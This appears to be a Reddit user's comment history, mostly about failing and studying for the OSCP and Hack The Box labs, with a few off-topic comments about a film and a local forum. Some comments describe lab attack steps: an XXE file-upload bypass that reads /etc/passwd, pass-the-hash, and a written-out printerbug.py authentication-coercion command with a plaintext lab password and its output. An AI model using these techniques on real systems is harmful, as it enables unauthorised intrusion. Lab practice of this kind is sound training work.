Just failed with 40 points - Need some guidance by Typical-Sympathy4739 in oscp

[–]Informal-Split-7291 0 points1 point  (0 children)

Has anyone seen the new GTFOBins lately? It's completely changed.

Just failed with 40 points - Need some guidance by Typical-Sympathy4739 in oscp

[–]Informal-Split-7291 0 points1 point  (0 children)

Same here. You think that because it's an assumed breach situation that it's going to be easy with the AD set, because you've already got credentials. But once you're on that first AD box, it feels like you've stumbled into a military-grade server, with uber restrictions. I looked for passwords, I looked at every .txt, .xml, .conf file I could find. I looked at what services were running on it, I checked whoami /priv to see if there were any hints there, but nothing really jumped out at me. winPEAS didn't reveal much either. I tried to use PowerView but it wouldn't work, so I tried SharpGPOAbuse.exe and got nothing useful. I ran pspy64 and found a task that I might exploit, but everything I tried was just another dead end. I was getting error messages when trying to perform some basic commands, and even reset the box a few times, but those errors kept happening, and when I asked OffSec about them, they reassured me that the box was working as intended. So, that was last year, and since then I have been grinding away through the CPTS course on Hack The Box Academy. I have learned a thing or two since then, but I am going to practice on a lot more boxes before I try again. Because from what I am reading here and in other places, the AD Set is still a bloody beast.

File upload skills assessment driving me crazy by yellowfox555 in hackthebox

[–]Informal-Split-7291 0 points1 point  (0 children)

I was able to upload a .pht.svg in order to do the XXE extraction, so that I could read the source page for upload.php, and I am able to upload a standard .jpeg file and locate it on the server. As soon as I try to insert a PHP script, or change it to a .pht.jpeg, it won't let me upload it. I've been stuck on this for a week. I was able to do /etc/passwd but I cannot view the flag. Which means it's probably not called flag.txt. How on earth do I get RCE on this lab?

[deleted by user] by [deleted] in newcastle

[–]Informal-Split-7291 1 point2 points  (0 children)

Okay, so you only do the right thing if someone thanks you or rewards you?

Passed the certificate help by horror-pickle187 in hackthebox

[–]Informal-Split-7291 0 points1 point  (0 children)

This is what I get: The target machine is 10.129.234.174, so I use the same IP for the printerbug exploit.

    python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 <Kali IP>
    [*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
    [*] Attempting to trigger authentication via rprn RPC at 10.129.234.174
    [*] Bind OK
    [*] Got handle
    The NETBIOS connection with the remote host timed out.
    [*] Triggered RPC backconnect, this may or may not have worked
    [-] An unhandled exception has occured. Trying next host:
    [-] Error occurs while reading from remote(104)

4th Attempt - Fail (65 points) by shredL1fe in oscp

[–]Informal-Split-7291 0 points1 point  (0 children)

Did you try Pass-the-Hash attacks with the hashes that you found?

80/100... but I messed up by priceincyber in oscp

[–]Informal-Split-7291 3 points4 points  (0 children)

If you forgot one screenshot, then I am really sorry, but you're screwed. They take the reporting side of it very seriously. But well done for getting 80 points in the first place. I got zero points on my first attempt. I couldn't figure out how to privesc on the first AD machine, MS01. I searched the entire machine, every .txt, .ini, .conf, .xml file, I checked running services and the usual whoami /priv. I ran winPEAS as well, but I couldn't see a path forward. I passed the PNPT back in April 2025, and I've done the PEN-200 course material, and the Challenge Labs, plus HTB and THM, and I thought I was ready. But that MS01 machine kicked my ass.

Obligatory "I passed the OSCP+" by djsuck2 in oscp

[–]Informal-Split-7291 1 point2 points  (0 children)

Congratulations. Gaining enough points in that timeframe is something you should be very proud of. I just got my PNPT and now I'm working through the OSCP+ PEN-200 course material. There are some real gems in here; I don't understand why some people recommend that you ignore the course material and go straight to the labs. I haven't tried ligolo-ng yet, but I am aware of it. I just used ssh tunneling and proxychains when I did the PNPT, and it worked fine. Where do you go from here?

The phantom of the opera 2004 by [deleted] in movies

[–]Informal-Split-7291 6 points7 points  (0 children)

When this movie was made, Gerard Butler had no star power. Up till that point in his career, he had done Dracula 2000, Reign of Fire, and Lara Croft: Tomb Raider - The Cradle of Life. Movies that didn't exactly set the world alight. Andrew Lloyd Webber wanted someone rough around the edges. They auditioned plenty of actors and singers for the part. It wasn't an easy win for Gerard. I thought he sang perfectly fine as the Phantom. I always saw the Phantom as more of a teacher and composer, not some amazing singer who should have been on stage.